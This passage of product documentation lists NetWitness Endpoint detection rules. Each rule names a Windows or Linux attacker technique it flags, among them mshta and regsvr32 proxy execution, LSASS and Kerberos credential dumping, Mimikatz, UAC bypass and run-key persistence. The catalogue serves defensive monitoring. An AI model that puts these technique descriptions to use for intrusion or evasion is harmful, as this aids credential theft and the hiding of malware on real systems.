* analysis.file = misleading file extension
Modifies Registry Using Command-Line Registry Toolmodifies_registry_using_command-line_registry_toolModifying registry using command-line registry tool can be an indication of adversaries trying to interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = modifies registry using command-line registry tool
Modifies Run Keymodifies_run_keyModifying run key can be an indication of someone trying to use startup configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = modifies run key
Modifies Shell-Open-Command File Associationmodifies_shell-open-command_file_associationFile association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access. Modifying shell-open-command file association can be an attempt to execute arbitrary commands in order to maintain persistence and remain undetected.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = modifies shell-open-command file association
Mshta Runs Command Promptmshta_runs_command_promptMshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. It is suspicious for Mshta to run a command prompt.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = mshta runs command prompt
Mshta Runs Powershellmshta_runs_powershellMshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. It is suspicious for Mshta to run powershell.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = mshta runs powershell
Mshta Runs Scripting Enginemshta_runs_scripting_engineMshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. It is suspicious for Mshta to execute a scripting engine.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = mshta runs scripting engine
Mshta Writes Executablemshta_writes_executableMshta.exe executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. It is suspicious for Mshta to write an executable.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = mshta writes executable
Network Accessnetwork_accessA process is trying to get network access.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = network access
No Antivirus Notification Disabledno_antivirus_notification_disabledDisabling no antivirus notification can be an indication of an adversary attempting to block indicators or event notifications, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = no antivirus notification disabled
No Firewall Notification Disabledno_firewall_notification_disabledDisabling no firewall notification can be an indication of an adversary attempting to block indicators or event notifications, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = no firewall notification disabled
No UAC Notification Disabledno_uac_notification_disabledDisabling no UAC notification can be an indication of an adversary attempting to block indicators or event notifications, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = no uac notification disabled
No Windows Update Notification Disabledno_windows_update_notification_disabledDisabling no Windows update notification can be an indication of an adversary attempting to block indicators or event notifications, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = no windows update notification disabled
Non-Microsoft Modifies Bad Certificate Warning Settingnon-microsoft_modifies_bad_certificate_warning_settingNon-Microsoft modifing bad certificate warning setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies bad certificate warning setting
Non-Microsoft Modifies Firewall Policynon-microsoft_modifies_firewall_policyNon-Microsoft modifing firewall policy can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies firewall policy
Non-Microsoft Modifies Internet Zone Settingnon-microsoft_modifies_internet_zone_settingAdding firewall rule can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies internet zone setting
Non-Microsoft Modifies LUA Settingnon-microsoft_modifies_lua_settingNon-Microsoft modifing LUA setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies lua setting
Non-Microsoft Modifies Registry Editor Settingnon-microsoft_modifies_registry_editor_settingNon-Microsoft modifing registry editor setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies registry editor setting
Non-Microsoft Modifies Security Center Confignon-microsoft_modifies_security_center_configNon-Microsoft modifing security center config can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies security center config
Non-Microsoft Modifies Services ImagePathnon-microsoft_modifies_services_imagepathNon-Microsoft modifing services ImagePath can be an indication of someone trying to modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies services imagepath
Non-Microsoft Modifies Task Manager Settingnon-microsoft_modifies_task_manager_settingNon-Microsoft modifing task manager setting can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies task manager setting
Non-Microsoft Modifies Windows System Policynon-microsoft_modifies_windows_system_policyNon-Microsoft modifieing windows system policy can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies windows system policy
Non-Microsoft Modifies Zone Crossing Warning Settingnon-microsoft_modifies_zone_crossing_warning_settingNon-Microsoft modifing zone crossing warning setting can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = non-microsoft modifies zone crossing warning setting
Office Application Crashedoffice_application_crashedMicrosoft Office application crashes can happen fairly frequently, but this may be interesting in combination with other indicators involving those applications.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application crashed
Office Application Injects Remote Processoffice_application_injects_remote_processA Microsoft Office application injecting a remote process may indicate a spearphishing attachment with a malicious payload. Process injection may enable an attacker to gain access to system resources or elevate privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application injects remote process
Office Application Runs BITSoffice_application_runs_bitsA Microsoft Office application running Background Intelligent Transfer Service (BITS) may indicate a spearphishing attachment with a malicious payload. BITS may be used to exfiltrate data outside the environment.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs bits
Office Application Runs Command Promptoffice_application_runs_command_promptA Microsoft Office application running the command prompt may indicate a spearphishing attachment with a malicious payload has been executed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs command prompt
Office Application Runs Powershelloffice_application_runs_powershellA Microsoft Office application running powershell may indicate a spearphishing attachment with a malicious payload has been executed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs powershell
Office Application Runs Scripted FTPoffice_application_runs_scripted_ftpA Microsoft Office application running scripted FTP may indicate a spearphishing attachment with a malicious payload. FTP may be used to exfiltrate data outside the environment.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs scripted ftp
Office Application Runs Scripting Engineoffice_application_runs_scripting_engineA Microsoft Office application running a scripting engine may indicate a spearphishing attachment with a malicious payload has been executed.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs scripting engine
Office Application Runs Task Scheduleroffice_application_runs_task_schedulerA Microsoft Office application running a job or scheduling a task may indicate a spearphishing attachment with a malicious payload.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs task scheduler
Office Application Runs WMI Scripting Engineoffice_application_runs_wmi_scripting_engineA Microsoft Office application running Windows Management Instrumentation (WMI) may indicate a spearphishing attachment with a malicious payload.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application runs wmi scripting engine
Office Application Writes Executableoffice_application_writes_executableA Microsoft Office application writing an executable may indicate a spearphishing attachment with a malicious payload.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = office application writes executable
Opens Browser Processopens_browser_processWhen a file not digitally signed by apple opens broswer process it might indicate adversary effort for process injection into browser.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = opens browser process
Opens OS Processopens_os_processThis may indicate Process injection which is a method of executing arbitrary code in the address space of a separate live process. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = opens os process
Opens Processopens_processThis may indicate Process injection which is a method of executing arbitrary code in the address space of a separate live process. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = opens process
OS Process Runs Command Shellos_process_runs_command_shellThis rule will return any filtered Windows OS process launching either 'cmd.exe' or 'powershell.exe'.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = os process runs command shell
Outbound from Unsigned AppData Directoryoutbound_from_unsigned_appdata_directoryThis rule will return any unsigned filtered file name which has the source of a Windows "AppData" directory that establishes an outbound network connection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = outbound from unsigned appdata directory
Outbound from Unsigned Temporary Directoryoutbound_from_unsigned_temporary_directoryThis rule will return any unsigned filtered file name which has the source of a Windows "Temp" directory that establishes an outbound network connection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = outbound from unsigned temporary directory
Outbound from Windows Directoryoutbound_from_windows_directoryThis rule will return any unsigned filtered file name which has the source of the Windows root directory that establishes an outbound network connection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = outbound from windows directory
PackedpackedMalware may use packing applications to repackage itself frequently to evade threat detection solutions based on static signatures.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = packed
Packed And Autorunpacked_and_autorunAdversaries use Software packing to compress or encrypt an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. To ensure persistence across reboots attackers configure to run those on system startup.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = packed and autorun
Packed And Network Accesspacked_and_network_accessAdversaries use software packing to compress or encrypt an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. This file is trying to gain access to the network.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = packed and network access
Performs Scripted File Transferperforms_scripted_file_transferScripts may be used to transfer files over FTP during the course of an attack or for executing command and control instructions.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = performs scripted file transfer
Possible Login Bypasspossible_login_bypassAccessibility features that may be launched with a key combination before a user has logged in . Possible login bypass can be an indicator of someone trying to modify the way these programs are launched to maintain a persistent presence on the system which can escalate privileges and create backdoor without logging in to the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = possible login bypass
Possible Mimikatz Activitypossible_mimikatz_activityMimikatz has become an extremely effective attack tool against Windows clients. Mimikatz activity can be a strong indication of someone trying to dump credentials locally or remotely using powershell Mimikatz tool to be able to gain a privileged foothold, allowing them unfettered access to elevate privileges and move about the network freely without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = possible mimikatz activity
Possible RDP Session Hijackingpossible_rdp_session_hijackingPossible RDP session hijacking can be indication of adversaries trying to connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries may also use RDP in conjunction with the Accessibility Features technique for Persistence or perform RDP session hijacking which involves stealing a legitimate user's remote session.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = possible rdp session hijacking
Possibly Configures UAC Bypasspossibly_configures_uac_bypassConfiguring UAC can be an indication of possible Windows User Account Control (UAC) bypass. Attacker can use these techniques to elevate privileges to administrator if the target process is unprotected. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = possibly configures uac bypass
Possibly Renamed net.exe Detectedpossibly_renamed_net.exe_detectedPresence of renamed net.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = possibly renamed net.exe detected
Potential Outlook Exploitpotential_outlook_exploitThis rule looks for potential Outlook exploits that would leverage 'outlook.exe' launching any suspicious 'cmd.exe','powershell.exe','wscript.exe' or 'cscript.exe'

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = potential outlook exploit
PowerShell Command Using String Manipulationpowershell_command_using_string_manipulationString manipulation can be used to obfuscate PowerShell commands to escape detection. These obfuscated commands can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = powershell command using string manipulation
PowerShell Double Base64powershell_double_base64This rule will return the double Base64 encoding scheme leveraged in a lot of PowerShell attacks to evade detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.4 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = powershell double base64
Powershell Injects Remote Processpowershell_injects_remote_processPowershell injecting remote process can be an indication of someone trying to create and run malicious processes remotely, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = powershell injects remote process
Powershell Opens LSASS Processpowershell_opens_lsass_processPowershell running LSASS process can be an indication of someone trying to dump credentials locally or remotely, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = powershell opens lsass process
Powershell Runs Command Promptpowershell_runs_command_promptPowershell running command prompt can be an indication of someone trying to run malicious commands using to compromise the system or the user, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = powershell runs command prompt
Powershell Runs Scripting Enginepowershell_runs_scripting_enginePowershell running scripting engine can be an indication of someone trying to run malicious scripts to compromise the system or the user, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = powershell runs scripting engine
Process Authorized In Firewallprocess_authorized_in_firewallFirewall allows process access based on details about the process and access control policy in use.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = process authorized in firewall
Process Redirects to STDOUT or STDERRprocess_redirects_to_stdout_or_stderrThis will return any process event that contains the launch arguments '2>&1' which will redirect STDOUT and STDERR.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = process redirects to stdout or stderr
Psexesvc Runs Powershellpsexesvc_runs_powershellPsexesvc running powershell can be an indication of someone trying to execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = psexesvc runs powershell
Psexesvc Runs Scripting Enginepsexesvc_runs_scripting_enginePsexesvc running scripting engine can be an indication of someone trying to execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = psexesvc runs scripting engine
Psexesvc Runs Shell Commandspsexesvc_runs_shell_commandsPsexesvc running shell commands can be an indication of someone trying to execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. These techniques can also be used to maintain persistence or for privilege escalation

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = psexesvc runs shell commands
Queries Cached Kerberos Ticketsqueries_cached_kerberos_ticketsQuerying cached kerberos tickets can be attempt to obtain account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries cached kerberos tickets
Queries Processes On Local Systemqueries_processes_on_local_systemProcessing queries on local system can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries processes on local system
Queries Processes On Remote Systemqueries_processes_on_remote_systemProcessing queries on remote system can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = queries processes on remote system
Queries Registry Using Command-Line Registry Toolqueries_registry_using_command-line_registry_toolQuerying registry using command-line registry tool can be an indication of adversaries trying to interact with the Windows Registry to gather information about the system, configuration, and installed software.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries registry using command-line registry tool
Queries Terminal Sessionsqueries_terminal_sessionsQuerying terminal sessions can be an indication of someone trying to discover potential attack vectors in the system , and the same can be used for further exploitation of the system

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = queries terminal sessions
Queries Users Logged On Local Systemqueries_users_logged_on_local_systemQuerying users logged on local system can be an indication of someone trying to discover potential attack vectors in the system , and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = queries users logged on local system
Queries Users Logged On Remote Systemqueries_users_logged_on_remote_systemQuerying users logged on remote system can be an indication of someone trying to discover potential attack vectors in the system , and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = queries users logged on remote system
RDP Launching Loopback Addressrdp_launching_loopback_addressThis rule detects an attempt to setup RDP over an SSH tunnel. A compromised system could be using localhost to forward an RDP session to itself for use by an attacker.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = rdp launching loopback address
Record Screen Captures Using PSR Toolrecord_screen_captures_using_psr_toolRecording screen captures using PSR tool can be an indicator of an adversaries attempting to take screen captures of the desktop to gather information over the course of an operation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = record screen captures using psr tool
Registers Shim Databaseregisters_shim_databaseMicrosoft Windows Application Compatibility Toolkit (ACT) enables shims to be used to provide backwards compatibility for older versions of Windows or legacy applications. Malicious actors may use shims to gain persistence or elevate privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = registers shim database
Registry Tools Disabledregistry_tools_disabledAn administrative user has disabled access to the registry editor.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = registry tools disabled
Regsvr32 Creates Windows Taskregsvr32_creates_windows_taskRegsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools. Regsvr32 creating a windows task could allow an attacker to gain control of the system by running malicious code.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 creates windows task
Regsvr32 Runs Powershellregsvr32_runs_powershellRegsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 runs powershell
Regsvr32 Runs Rundll32regsvr32_runs_rundll32Regsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools. This rule detects unusual behavior in the form of registration and run of a DLL in the same command.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 runs rundll32
Regsvr32 Writes Executableregsvr32_writes_executableRegsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools. Regsvr32 writing an executable could indicate delivery of a backdoor to the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = regsvr32 writes executable
Remote Directory Traversalremote_directory_traversalAdversary can enumerate remote share directory and files. This can be used for reconnaissance, discovery and collection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = remote directory traversal
RPM Hash Mismatchrpm_hash_mismatchA hash mismatch may indicate a file has been altered from its original state and call into question its integrity. Since RPMs typically contain compiled software this could mean an attacker is trying to disguise malicious malware as legitimate.
RPM Hash Mismatch In Important System Directoryrpm_hash_mismatch_in_important_system_directoryA hash mismatch may indicate a file has been altered from its original state and call into question its integrity. Since RPMs typically contain compiled software this could mean an attacker is trying to disguise malicious malware as legitimate.
RPM Ownership Changedrpm_ownership_changedThis rule will trigger for any changes in ownership of executable linked to RPM installations. Adversaries can use changed permissions for evading defenses implemented by access controls.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = rpm ownership changed
RPM Permissions Changedrpm_permissions_changedThis rule will trigger for any changes in permissions of executable linked to RPM installations. Adversaries can use changed permissions for evading defenses implemented by access controls.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = rpm permissions changed
Rundll32 Creates Windows Taskrundll32_creates_windows_taskRundll32 program can be called to execute an arbitrary binary. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = rundll32 creates windows task
Rundll32 Runs Powershellrundll32_runs_powershellRundll32 program can be called to execute an arbitrary binary. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = rundll32 runs powershell
Runs ACL Management Toolruns_acl_management_toolRunning ACL management tool can be an indication of someone trying to run multiple malicious commands needed to perform multi-stage attack to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs acl management tool
Runs Active Directory Service Query Toolruns_active_directory_service_query_toolRunning active directory service query can be an indication of someone trying to discover potential attack vectors in the system, and the same can be used for further exploitation of the system.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = runs active directory service query tool
Runs Binary Located In Recycle Bin Directoryruns_binary_located_in_recycle_bin_directoryA technique has been used by malware authors where a malicious file or process is invoked and running out of the $RECYCLE.BIN folder on Windows systems.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = runs binary located in recycle bin directory
